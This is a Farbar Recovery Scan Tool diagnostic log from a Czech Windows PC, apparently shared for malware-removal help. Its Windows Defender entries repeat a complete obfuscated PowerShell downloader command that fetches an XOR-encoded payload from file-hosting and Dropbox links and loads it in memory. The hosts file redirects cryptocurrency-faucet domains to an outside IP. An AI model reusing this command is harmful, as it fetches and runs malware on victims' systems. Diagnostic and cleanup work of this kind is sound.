BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_271\bin\jp2ssv.dll [2020-10-26] (Oracle America, Inc. -> Oracle Corporation)
Toolbar: HKLM-x32 - WebTranslator - {BFC32E1D-EE75-4A48-BC60-104E11EE2431} - C:\TRANSLAT\Translator_2016.03\WebIE.dll [2019-01-28] () [File not signed]
Handler: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
==================== Hosts content: =========================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2016-07-16 12:47 - 2020-03-06 18:30 - 000001029 ____R C:\WINDOWS\system32\drivers\etc\hosts
127.0.0.1 www.langsoft.cz
127.0.0.1 www.pctranslator.cz
177.9.78.49 ww1.moondoge.co.in
177.9.78.49 ww1.moonbit.co.in
2019-11-30 16:39 - 2019-11-30 16:44 - 000000439 _____ C:\WINDOWS\system32\drivers\etc\hosts.ics
==================== Other Areas ===========================
(Currently there is no automatic fix for this section.)
HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\ProgramData\Oracle\Java\javapath;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;%SYSTEMROOT%\System32\OpenSSH\
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\Control Panel\Desktop\\Wallpaper -> c:\windows\web\wallpaper\theme1\img13.jpg
DNS Servers: 192.168.0.1 - 1.1.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin)
Windows Firewall is enabled.
==================== MSCONFIG/TASK MANAGER disabled items ==
(If an entry is included in the fixlist, it will be removed.)
HKLM\...\StartupApproved\Run32: => "Dropbox"
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\StartupApproved\StartupFolder: => "Poslat do aplikace OneNote.lnk"
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\StartupApproved\StartupFolder: => "IQTray.lnk"
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\StartupApproved\Run: => "Microsoft Software Essentials"
==================== FirewallRules (Whitelisted) ================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
FirewallRules: [UDP Query User{4CF5DFC9-9461-49D6-950C-BB62564F6244}C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe => No File
FirewallRules: [TCP Query User{CD7B74D8-A37B-4004-84B4-A34E0A3D68ED}C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe => No File
FirewallRules: [UDP Query User{BC12CC3D-9EB7-430F-A11E-D240044FD1A6}C:\program files (x86)\youwave android\vb\vboxsdl.exe] => (Allow) C:\program files (x86)\youwave android\vb\vboxsdl.exe => No File
FirewallRules: [TCP Query User{E1BC68F1-347B-4940-8A33-5D907DBCDA84}C:\program files (x86)\youwave android\vb\vboxsdl.exe] => (Allow) C:\program files (x86)\youwave android\vb\vboxsdl.exe => No File
FirewallRules: [UDP Query User{29287B3F-2A2F-4C57-A399-98061B1E6F2B}C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe => No File
FirewallRules: [TCP Query User{7E06897A-6AF1-466E-9D68-134E4975B2C8}C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe => No File
FirewallRules: [{793400D7-7C54-425B-9BD7-60F988299959}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{D34719B9-E1F9-42F6-BA3A-AA6AF2D45F2E}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{2F9D3059-4454-4A07-BEE5-D6684A9BC8B9}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{033BC72C-1DEC-4D1D-87CB-14942A26DDDB}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [UDP Query User{25003063-5796-4BA7-9F27-DF50B557D31D}D:\filmy\seriály\telenovely\moonbot\moonbot.exe] => (Allow) D:\filmy\seriály\telenovely\moonbot\moonbot.exe => No File
FirewallRules: [TCP Query User{E8D4CD91-1165-4346-8883-1D96257E6F52}D:\filmy\seriály\telenovely\moonbot\moonbot.exe] => (Allow) D:\filmy\seriály\telenovely\moonbot\moonbot.exe => No File
FirewallRules: [{ADECB0C0-D817-4AFC-AB5F-3E7FDA043DFE}] => (Allow) C:\WINDOWS\system32\alg.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{CC710CB0-69B1-4D2B-9AAE-B86204635A9F}] => (Allow) C:\WINDOWS\system32\alg.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{DE047D0E-57E7-42E5-852F-33C6129D3B85}] => (Allow) C:\WINDOWS\system32\alg.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [UDP Query User{0AAFD932-9B41-400A-B798-B7F6A5298120}C:\program files\videolan\vlc\vlc.exe] => (Allow) C:\program files\videolan\vlc\vlc.exe (VideoLAN -> VideoLAN)
FirewallRules: [TCP Query User{0FFA7186-061D-43D7-922F-73C9FE27F461}C:\program files\videolan\vlc\vlc.exe] => (Allow) C:\program files\videolan\vlc\vlc.exe (VideoLAN -> VideoLAN)
FirewallRules: [UDP Query User{D7909A0E-59A3-44AA-AD21-357E7A504E90}C:\users\irena-pc\appdata\local\jdownloader 2.0\jdownloader2.exe] => (Allow) C:\users\irena-pc\appdata\local\jdownloader 2.0\jdownloader2.exe (Appwork GmbH -> AppWork GmbH)
FirewallRules: [TCP Query User{60724E25-F8FD-44AA-9BC9-A2ADC8EC3C89}C:\users\irena-pc\appdata\local\jdownloader 2.0\jdownloader2.exe] => (Allow) C:\users\irena-pc\appdata\local\jdownloader 2.0\jdownloader2.exe (Appwork GmbH -> AppWork GmbH)
FirewallRules: [{C9001568-7E61-4092-92AC-A2A34F885F7B}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{4E0915DD-85DC-4816-9616-A952C0C0C79C}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{1AB3D34D-2096-4639-A6F4-DB0021276C1B}] => (Allow) C:\Program Files\Microsoft Office\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{8A8D7038-61CD-44CF-88BD-3B4A6221113F}] => (Allow) C:\Program Files\Microsoft Office\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{6E0C9F16-EE9A-44B8-9451-7D5FB88A5D9D}] => (Allow) C:\Program Files\Microsoft Office\Office16\lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{EB36692E-B7B2-42BD-BC9B-B5B9C427A112}] => (Allow) C:\Program Files\Microsoft Office\Office16\lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [TCP Query User{2E494270-3352-4EE4-9BEB-DFDABEB0B492}C:\utorrent\utorrent.exe] => (Allow) C:\utorrent\utorrent.exe (uTorrent.CZ -> BitTorrent, Inc.) [File not signed]
FirewallRules: [UDP Query User{CE8260C1-93C7-47AF-97D4-687806A341AB}C:\utorrent\utorrent.exe] => (Allow) C:\utorrent\utorrent.exe (uTorrent.CZ -> BitTorrent, Inc.) [File not signed]
FirewallRules: [TCP Query User{41A0FD6F-32C7-4629-843F-F84BD1CF7F57}C:\totalcmd\totalcmd64.exe] => (Allow) C:\totalcmd\totalcmd64.exe (Ghisler Software GmbH -> Ghisler Software GmbH)
FirewallRules: [UDP Query User{F7DDB9BD-EF26-4906-BD31-A72205B5AFBB}C:\totalcmd\totalcmd64.exe] => (Allow) C:\totalcmd\totalcmd64.exe (Ghisler Software GmbH -> Ghisler Software GmbH)
FirewallRules: [TCP Query User{2996E712-43FC-4FF8-8202-BA352CC77FF9}C:\program files (x86)\java\jre1.8.0_271\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_271\bin\javaw.exe
FirewallRules: [UDP Query User{E5D79571-6F5B-47A0-BB49-86E0BBEFF6CD}C:\program files (x86)\java\jre1.8.0_271\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_271\bin\javaw.exe
FirewallRules: [{ECECF438-162A-4245-9BA1-DB6164C401DB}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)
==================== Restore Points =========================
03-01-2021 20:48:22 Naplánovaný kontrolní bod
09-01-2021 18:42:24 Removed IQ Option
13-01-2021 21:32:33 Instalační služba modulů systému Windows
==================== Faulty Device Manager Devices ============
==================== Event log errors: ========================
Application errors:
==================
Error: (01/20/2021 08:00:00 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0
Error: (01/19/2021 07:14:25 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0
Error: (01/18/2021 01:04:48 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0
Error: (01/17/2021 08:09:58 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0
Error: (01/16/2021 07:48:31 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0
System errors:
=============
Error: (01/20/2021 05:12:05 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Služba Služba Windows Media Player Network Sharing byla nečekaně ukončena. Stalo se to 1 krát. Následující opravná akce bude spuštěna za 30000 milisekund: Restartovat službu.
Error: (01/20/2021 05:12:05 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Služba Adobe Acrobat Update Service byla neočekávaně ukončena. Tento stav nastal již 1krát.
Error: (01/20/2021 05:12:05 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Služba VIA Karaoke digital mixer Service byla neočekávaně ukončena. Tento stav nastal již 1krát.
Error: (01/20/2021 04:59:25 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Služba Služba Windows Media Player Network Sharing byla nečekaně ukončena. Stalo se to 1 krát. Následující opravná akce bude spuštěna za 30000 milisekund: Restartovat službu.
Error: (01/20/2021 04:59:25 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Služba VIA Karaoke digital mixer Service byla neočekávaně ukončena. Tento stav nastal již 1krát.
Error: (01/20/2021 04:59:25 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Služba Adobe Acrobat Update Service byla neočekávaně ukončena. Tento stav nastal již 1krát.
Windows Defender:
===================================
Date: 2021-01-20 18:14:17.7510000Z
Description:
Antivirová ochrana v programu Microsoft Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: TrojanDownloader:PowerShell/Gripogle.A
ID: 2147767492
Závažnost: Vážné
Kategorie: Trojský stahovací program
Cesta: CmdLine:_C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe [Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$dOZcdIsKCaak=(New-Object Net.WebClient).DownloadData('https://pixeldrain.com/api/file/jChFnuTF');for ($i=0;$i -lt $dOZcdIsKCaak.Length;$i++){$dOZcdIsKCaak[$i]=[byte]($dOZcdIsKCaak[$i] -bxor 'Ihv'[$i % 'Ihv'.Length])};[Threading.Thread]::GetDomain().Load($dOZcdIsKCaak);[sxT]::oEr('https://dl.dropbox.com/s/a6i75g8ban8to85/sUeLzvMwVINE', 'RegSvcs.exe', 'https://iplogger.org/1KDm37', '', 'VRSKOJqu')
Původ detekce: Neznámý
Typ detekce: Konkrétní
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.329.2534.0, AS: 1.329.2534.0, NIS: 1.329.2534.0
Verze modulu: AM: 1.1.17700.4, NIS: 1.1.17700.4
Date: 2021-01-20 17:09:21.2090000Z
Description:
Antivirová ochrana v programu Microsoft Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: TrojanDownloader:PowerShell/Gripogle.A
ID: 2147767492
Závažnost: Vážné
Kategorie: Trojský stahovací program
Cesta: CmdLine:_C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe [Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$dOZcdIsKCaak=(New-Object Net.WebClient).DownloadData('https://pixeldrain.com/api/file/jChFnuTF');for ($i=0;$i -lt $dOZcdIsKCaak.Length;$i++){$dOZcdIsKCaak[$i]=[byte]($dOZcdIsKCaak[$i] -bxor 'Ihv'[$i % 'Ihv'.Length])};[Threading.Thread]::GetDomain().Load($dOZcdIsKCaak);[sxT]::oEr('https://dl.dropbox.com/s/a6i75g8ban8to85/sUeLzvMwVINE', 'RegSvcs.exe', 'https://iplogger.org/1KDm37', '', 'VRSKOJqu')
Původ detekce: Neznámý
Typ detekce: Konkrétní
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.329.2528.0, AS: 1.329.2528.0, NIS: 1.329.2528.0
Verze modulu: AM: 1.1.17700.4, NIS: 1.1.17700.4
Date: 2021-01-20 15:18:54.2110000Z
Description:
Prohledávání Antivirová ochrana v programu Microsoft Defender bylo zastaveno před dokončením.
ID prohledávání: {5BABBB36-9445-4077-8621-59FC0CF7C04A}
Typ prohledávání: Antimalwarový program
Parametry prohledávání: Rychlé prohledávání
Uživatel: NT AUTHORITY\SYSTEM
Date: 2021-01-20 11:15:09.7920000Z
Description:
Antivirová ochrana v programu Microsoft Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: TrojanDownloader:PowerShell/Gripogle.A
ID: 2147767492
Závažnost: Vážné
Kategorie: Trojský stahovací program
Cesta: CmdLine:_C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe [Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$dOZcdIsKCaak=(New-Object Net.WebClient).DownloadData('https://pixeldrain.com/api/file/jChFnuTF');for ($i=0;$i -lt $dOZcdIsKCaak.Length;$i++){$dOZcdIsKCaak[$i]=[byte]($dOZcdIsKCaak[$i] -bxor 'Ihv'[$i % 'Ihv'.Length])};[Threading.Thread]::GetDomain().Load($dOZcdIsKCaak);[sxT]::oEr('https://dl.dropbox.com/s/a6i75g8ban8to85/sUeLzvMwVINE', 'RegSvcs.exe', 'https://iplogger.org/1KDm37', '', 'VRSKOJqu')
Původ detekce: Neznámý
Typ detekce: Konkrétní
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.329.2519.0, AS: 1.329.2519.0, NIS: 1.329.2519.0
Verze modulu: AM: 1.1.17700.4, NIS: 1.1.17700.4
Date: 2021-01-20 10:29:02.0140000Z
Description:
Antivirová ochrana v programu Microsoft Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: TrojanDownloader:PowerShell/Gripogle.A
ID: 2147767492
Závažnost: Vážné
Kategorie: Trojský stahovací program
Cesta: CmdLine:_C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe [Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$dOZcdIsKCaak=(New-Object Net.WebClient).DownloadData('https://pixeldrain.com/api/file/jChFnuTF');for ($i=0;$i -lt $dOZcdIsKCaak.Length;$i++){$dOZcdIsKCaak[$i]=[byte]($dOZcdIsKCaak[$i] -bxor 'Ihv'[$i % 'Ihv'.Length])};[Threading.Thread]::GetDomain().Load($dOZcdIsKCaak);[sxT]::oEr('https://dl.dropbox.com/s/a6i75g8ban8to85/sUeLzvMwVINE', 'RegSvcs.exe', 'https://iplogger.org/1KDm37', '', 'VRSKOJqu')
Původ detekce: Neznámý
Typ detekce: Konkrétní
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.329.2507.0, AS: 1.329.2507.0, NIS: 1.329.2507.0
Verze modulu: AM: 1.1.17700.4, NIS: 1.1.17700.4
==================== Memory info ===========================
BIOS: American Megatrends Inc. P1.30 05/25/2010
Motherboard: ASRock HM55-HT
Processor: Intel(R) Core(TM) i3 CPU M 350 @ 2.27GHz
Percentage of memory in use: 72%
Total physical RAM: 3767.05 MB
Available physical RAM: 1051.44 MB
Total Virtual: 7351.05 MB
Available Virtual: 4661.58 MB
==================== Drives ================================
Drive c: () (Fixed) (Total:111.19 GB) (Free:60.17 GB) NTFS
Drive d: (Místní disk) (Fixed) (Total:465.76 GB) (Free:230.27 GB) NTFS
Drive e: (HDD Záloha) (Fixed) (Total:465.76 GB) (Free:63.57 GB) NTFS
Drive g: (HDD SERIÁLY) (Fixed) (Total:1862.56 GB) (Free:76.56 GB) FAT32
\\?\Volume{89fed6d2-0000-0000-0000-100000000000}\ (Rezervováno systémem) (Fixed) (Total:0.1 GB) (Free:0.06 GB) NTFS
\\?\Volume{89fed6d2-0000-0000-0000-a0d21b000000}\ () (Fixed) (Total:0.5 GB) (Free:0.08 GB) NTFS
==================== MBR & Partition Table ====================
==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 111.8 GB) (Disk ID: 89FED6D2)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=111.2 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=509 MB) - (Type=27)
==========================================================
Disk: 1 (MBR Code: Windows 7/8/10) (Size: 465.8 GB) (Disk ID: B5BDF682)
Partition 1: (Not Active) - (Size=465.8 GB) - (Type=07 NTFS)
==========================================================
Disk: 2 (Size: 1863 GB) (Disk ID: 055752AB)
Partition 1: (Not Active) - (Size=1863 GB) - (Type=0C)
==========================================================
Disk: 3 (MBR Code: Windows 7/8/10) (Size: 465.8 GB) (Disk ID: DD2566A6)
Partition 1: (Not Active) - (Size=465.8 GB) - (Type=07 NTFS)
==================== End of Addition.txt =======================
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 20-01-2021
Ran by IRENA-PC (20-01-2021 18:44:34)
Running from C:\Users\IRENA-PC\Desktop
Windows 10 Pro Version 2004 19041.746 (X64) (2020-08-19 18:19:30)
Boot Mode: Normal
==========================================================
==================== Accounts: =============================
Administrator (S-1-5-21-3708313529-2431682257-2596704864-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3708313529-2431682257-2596704864-503 - Limited - Disabled)
defaultuser0 (S-1-5-21-3708313529-2431682257-2596704864-1000 - Limited - Disabled)
Guest (S-1-5-21-3708313529-2431682257-2596704864-501 - Limited - Disabled)
IRENA-PC (S-1-5-21-3708313529-2431682257-2596704864-1001 - Administrator - Enabled) => C:\Users\IRENA-PC
WDAGUtilityAccount (S-1-5-21-3708313529-2431682257-2596704864-504 - Limited - Disabled)
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Malwarebytes (Enabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
„Microsoft Office Proofing Tools 2016“ – lietuvių k. (HKLM\...\{90160000-001F-0427-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
7-Zip 16.04 (x64) (HKLM\...\7-Zip) (Version: 16.04 - Igor Pavlov)
Adobe Acrobat Reader DC - Czech (HKLM-x32\...\{AC76BA86-7AD7-1029-7B44-AC0F074E4100}) (Version: 20.013.20074 - Adobe Systems Incorporated)
Adobe Photoshop CC 2019 (HKLM-x32\...\PHSP_20_0_4) (Version: 20.0.4 - Adobe Systems Incorporated)
Aimersoft Helper Compact 2.5.2 (HKLM-x32\...\{405147F7-FCC5-499B-A27E-EA6BD4A80435}_is1) (Version: 2.5.2 - Aimersoft)
Alati za jezičnu provjeru u sustavu Microsoft Office 2016 - hrvatski (HKLM\...\{90160000-001F-041A-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Authy Desktop (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\authy) (Version: 1.8.3 - Twilio Inc.)
Avidemux 2.7 - 64 bits (HKLM-x32\...\Avidemux 2.7 - 64 bits (64-bit)) (Version: 2.7.1.180604 - )
Avidemux VC++ 64bits (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\{3598910c-c7d9-450b-bfde-5a8d49dabd30}) (Version: 2.7.3 - Mean)
Avidemux VC++ 64bits (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\{8cbf4d89-2ce8-4178-8bb4-1600f5e69e65}) (Version: 2.7.3 - Mean)
Avidemux VC++ 64bits (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\{b859fd90-1d56-4013-8e47-a727a65ae7a3}) (Version: 2.7.3 - Mean)
Avidemux VC++ 64bits (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\{c28b1ebe-2fed-4e19-a347-e0629e5cf6f5}) (Version: 2.7.2 - Mean)
Bighits4U Viewer 3.6 (HKLM-x32\...\{ACC1EF6D-F9C2-4B5E-BA01-25F3F9E57B68}) (Version: 3.6.0 - BigHits4U) Hidden
Bighits4U Viewer 3.6 (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Bighits4U Viewer 3.6 3.6.0) (Version: 3.6.0 - BigHits4U)
Công cụ Soát lỗi Microsoft Office 2016 - Tiếng Việt (HKLM\...\{90160000-001F-042A-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Eines de correcció del Microsoft Office 2016: català (HKLM\...\{90160000-001F-0403-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Exodus (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\exodus) (Version: 21.1.15 - Exodus Movement Inc)
Ferramentas de Verificação do Microsoft Office 2016 - Português (HKLM\...\{90160000-001F-0816-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Ferramentas de verificación de Microsoft Office 2016 - Galego (HKLM\...\{90160000-001F-0456-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Free MP3 Cutter 1.01 (HKLM-x32\...\{847E0734-4457-4B48-BF49-998D1CF2CFA1}_is1) (Version: - PolySoft Solutions)
Free Netflix Download version 5.0.16.1204 (HKLM-x32\...\Free Netflix Download_is1) (Version: 5.0.16.1204 - FreeGrabApp Ltd)
GhostMouse (HKLM-x32\...\GhostMouse_is1) (Version: Free V3.2.3 - ghost-mouse.com)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 87.0.4280.141 - Google LLC)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.36.51 - Google LLC) Hidden
Greenshot 1.2.9.129 (HKLM\...\Greenshot_is1) (Version: 1.2.9.129 - Greenshot)
HandBrake 1.2.2 (HKLM-x32\...\HandBrake) (Version: 1.2.2 - )
Herramientas de corrección de Microsoft Office 2016: español (HKLM\...\{90160000-001F-0C0A-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
I-Microsoft Office Proofing Tools 2016 - IsiZulu (HKLM\...\{90160000-001F-0435-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Innealan-dearbhaidh Microsoft Office 2016 - Gàidhlig (HKLM\...\{90160000-001F-0491-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Instrumente de verificare Microsoft Office 2016 - Română (HKLM\...\{90160000-001F-0418-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Java 8 Update 271 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180271F0}) (Version: 8.0.2710.9 - Oracle Corporation)
JDownloader 2 (HKLM\...\jdownloader2) (Version: 2.0 - AppWork GmbH)
Korrekturredskaber til Microsoft Office 2016 - Dansk (HKLM\...\{90160000-001F-0406-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Korrekturverktøy for Microsoft Office 2016 – norsk (bokmål) (HKLM\...\{90160000-001F-0414-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Korrekturverktøy for Microsoft Office 2016 – norsk (nynorsk) (HKLM\...\{90160000-001F-0814-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
MediaInfo 18.05 (HKLM\...\MediaInfo) (Version: 18.05 - MediaArea.net)
Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 87.0.664.75 - Microsoft Corporation)
Microsoft Edge Update (HKLM-x32\...\Microsoft Edge Update) (Version: 1.3.139.71 - )
Microsoft Office Professional Plus 2016 (HKLM\...\Office16.PROPLUS) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft Office Proofing Tools Kit Compilation 2016 (HKLM\...\Office16.PROOFKIT) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\OneDriveSetup.exe) (Version: 20.201.1005.0009 - Microsoft Corporation)
Microsoft Project Professional 2016 (HKLM\...\Office16.PRJPRO) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft Visio Professional 2016 (HKLM\...\Office16.VISPRO) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40660 (HKLM-x32\...\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}) (Version: 12.0.40660.0 - Microsoft Corporation)
